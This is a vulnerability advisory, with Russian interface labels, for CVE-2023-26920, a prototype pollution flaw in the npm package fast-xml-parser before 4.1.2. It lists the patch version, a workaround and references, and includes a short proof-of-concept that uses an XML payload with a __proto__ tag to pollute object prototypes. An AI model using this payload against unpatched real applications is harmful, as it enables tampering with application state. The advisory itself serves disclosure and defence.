Описание
fast-xml-parser vulnerable to Prototype Pollution through tag or attribute name
Impact
As a part of this vulnerability, user was able to se code using __proto__ as a tag or attribute name.
const { XMLParser, XMLBuilder, XMLValidator} = require("fast-xml-parser");
let XMLdata = "<__proto__><polluted>hacked</polluted></__proto__>"
const parser = new XMLParser();
let jObj = parser.parse(XMLdata);
console.log(jObj.polluted) // should return hacked
Patches
The problem has been patched in v4.1.2
Workarounds
User can check for "proto" in the XML string before parsing it to the parser.
References
https://gist.github.com/Sudistark/a5a45bd0804d522a1392cb5023aa7ef7
Ссылки
- https://github.com/NaturalIntelligence/fast-xml-parser/security/advisories/GHSA-x3cc-x39p-42qx
- https://nvd.nist.gov/vuln/detail/CVE-2023-26920
- https://github.com/NaturalIntelligence/fast-xml-parser/commit/2b032a4f799c63d83991e4f992f1c68e4dd05804
- https://gist.github.com/Sudistark/a5a45bd0804d522a1392cb5023aa7ef7
- https://github.com/advisories/GHSA-793h-6f7r-6qvm
Пакеты
Наименование
fast-xml-parser
npm
Затронутые версииВерсия исправления
< 4.1.2
4.1.2
Связанные уязвимости
CVSS3: 6.5
nvd
около 2 лет назад
fast-xml-parser before 4.1.2 allows __proto__ for Prototype Pollution.